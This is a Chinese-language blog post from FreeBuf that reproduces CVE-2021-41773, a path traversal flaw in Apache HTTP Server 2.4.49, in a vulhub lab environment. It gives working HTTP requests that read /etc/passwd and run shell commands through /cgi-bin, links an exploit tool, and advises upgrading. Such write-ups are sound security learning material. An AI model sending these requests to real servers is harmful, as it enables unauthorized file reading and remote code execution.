freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

CVE-2021-41773 Apache HTTP Server 路径穿越漏洞复现
2021-10-28 14:28:03

0、前言

​ 复现文章是好几个月前的了,最近也做过几次漏洞复现,奈何是在是CVE有点远古(实则是自己犯懒)就没写,今天就水一篇新的CVE吧。

1、漏洞简介

​ Apache HTTPd 是Apache基金会开源的一款HTTP服务器。2021年10月8日Apache HTTPd官方发布安全更新,披露CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞。攻击者利用这个漏洞,可以读取到Apache服务器web目录以外的其他文件,或读取web中的脚本源码,如果服务器开启CGI或cgid服务,攻击者可进行任意代码执行。

2、影响版本

​ Apache HTTP Server 2.4.49

3、漏洞复现

​ 这里我使用的是vulhub的环境,虚拟机上之前部的环境有点老,没有CVE-2021-41773,只能是将之前的删除重新下载最新的。docker开启步骤就省略。

image

​ 浏览器访问ip:8080。页面出现it works! 证明开启成功。

image

​ 开启代理,上神器burpsuite就可以开搞了。

路径穿越
GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1

image

RCE
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
echo; ls(要执行的命令)

image

4、修复方案

​ 升级到最新版的Apache HTTP Server 安全版本。

5、利用工具

​ 多翻了一下相关文章,找到了一个漏洞利用工具。

https://github.com/inbug-team/CVE-2021-41773_CVE-2021-42013

image

image

# 漏洞复现
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者